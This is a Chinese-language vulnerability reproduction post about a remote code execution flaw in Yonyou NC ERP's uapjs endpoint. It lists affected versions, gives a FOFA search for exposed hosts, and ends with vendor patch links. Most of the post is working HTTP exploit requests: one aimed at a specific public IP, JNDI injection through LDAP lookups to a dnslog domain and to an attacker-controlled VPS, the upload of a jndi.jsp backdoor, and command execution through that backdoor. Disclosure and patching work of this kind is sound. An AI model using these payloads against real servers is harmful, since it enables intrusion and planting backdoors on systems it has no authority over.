526互联

【漏洞复现】用友NC uapjs RCE漏洞(CNVD-C-2023-76801)

发布时间 2023-07-13 14:29:33作者: spmonkey

产品介绍

        用友NC是一款企业级ERP软件。作为一种信息化管理工具,用友NC提供了一系列业务管理模块,包括财务会计、采购管理、销售管理、物料管理、生产计划和人力资源管理等,帮助企业实现数字化转型和高效管理。

漏洞概述

        用友NC及NC Cloud系统存在任意文件上传漏洞,攻击者可通过uapjs(jsinvoke)应用构造恶意请求非法上传后门程序,此漏洞可以给NC服务器预埋后门,从而可以随意操作服务器。

影响范围

NC63、NC633、NC65、NC Cloud1903、NC Cloud1909、NC Cloud2005、NC Cloud2105、NC Cloud2111、YonBIP高级版2207

复现环境

FOFA:app="用友-NC-Cloud"

漏洞复现

POC(传参中的dnslog自行替换):

POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
Host: 104.233.215.211
User-Agent: Mozilla/4.0 (Mozilla/4.0; MSIE 7.0; Windows NT 5.1; FDM; SV1; .NET CLR 3.0.04506.30)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-formurlencoded
Content-Length: 285

{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${''.getClass().forName('javax.naming.InitialContext').newInstance().lookup('ldap://sqb2c1.dnslog.cn/exp')}","webapps/nc_web/jndi.jsp"]}

 利用思路:调用”nc.itf.iufo.IBaseSPService“服务中的"saveXStreamConfig"的方法,来接受对象和字符串,使用Java反射机制创建了一个javax.naming.InitialContext对象,并通过LDAP协议连接到指定的IP地址和端口,最后在根目录生成jsp恶意后门程序。

访问上传的文件 jndi.jsp。

GET /jndi.jsp HTTP/1.1
Host: 104.233.215.211
User-Agent: Mozilla/4.0 (Mozilla/4.0; MSIE 7.0; Windows NT 5.1; FDM; SV1; .NET CLR 3.0.04506.30)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-formurlencoded

EXP(VPSip请自行切换):

POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (Mozilla/4.0; MSIE 7.0; Windows NT 5.1; FDM; SV1; .NET CLR 3.0.04506.30)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-formurlencoded
Content-Length: 285

{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${''.getClass().forName('javax.naming.InitialContext').newInstance().lookup('ldap://VPSip:1389/TomcatBypass/TomcatEcho')}","webapps/nc_web/jndi.jsp"]}

JNDI注入工具开启监听后

执行命令:

GET /jndi.jsp HTTP/1.1
Host: 127.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
cmd: whoami

在这不做演示。

修复建议

打对应补丁,重启服务,各版本补丁获取方式如下:

NC63方案:
补丁名称:NC63uapjs安全问题补丁

补丁编码:NCM_NC6.3_000_UAP_BTS_20230308_GP_268498360

https://dsp.yonyou.com/patchcenter/patchdetail/10231678268499522701/0/2

NC633方案:
补丁名称:NC633uapjs安全问题补丁

补丁编码:NCM_NC6.33_000_UAP_BTS_20230308_GP_268527193

https://dsp.yonyou.com/patchcenter/patchdetail/10231678268528400707/0/2

NC65方案:
补丁名称:NC65uapjs安全问题补丁

补丁编码:NCM_NC6.5_000_UAP_BTS_20230308_GP_269462199

https://dsp.yonyou.com/patchcenter/patchdetail/10231678269463403718/0/2

NCC1903方案:
补丁名称:NCC1903uapjs安全问题补丁

补丁编码:NCM_NCCLOUD1903_10_UAP_BTS_20230308_GP_268560504

https://dsp.yonyou.com/patchcenter/patchdetail/11231678268561687890/0/2

NCC1909方案:
补丁名称:NCC1909uapjs安全问题补丁

补丁编码:NCM_NCCLOUD1909_10_UAP_BTS_20230308_GP_268596672

https://dsp.yonyou.com/patchcenter/patchdetail/11231678268597774895/0/2

NCC2005方案:
补丁名称:NCC2005uapjs安全问题补丁

补丁编码:NCM_NCCLOUD2020.05_10_UAP_BTS_20230308_GP_268622200

https://dsp.yonyou.com/patchcenter/patchdetail/10231678944167066463/0/2

NCC2105方案:
补丁名称:NCC2105uapjs安全问题补丁

补丁编码:NCM_NCCLOUD2021.05_10_UAP_BTS_20230308_GP_268652747

https://dsp.yonyou.com/patchcenter/patchdetail/11231678268653876905/0/2

NCC2111方案:
补丁名称:NCC2111uapjs安全问题补丁

补丁编码:NCM_NCCLOUD2021.11_010_UAP_BTS_20230308_GP_268680318

https://dsp.yonyou.com/patchcenter/patchdetail/11231678268681473910/0/2

YonBIP高级版2207方案:
补丁名称:YonBIP高级版2207uapjs安全问题补丁

补丁编码:NCM_YONBIP高级2207_010_UAP_BTS_20230308_GP_267337472

https://dsp.yonyou.com/patchcenter/patchdetail/11231678267338650434/0/2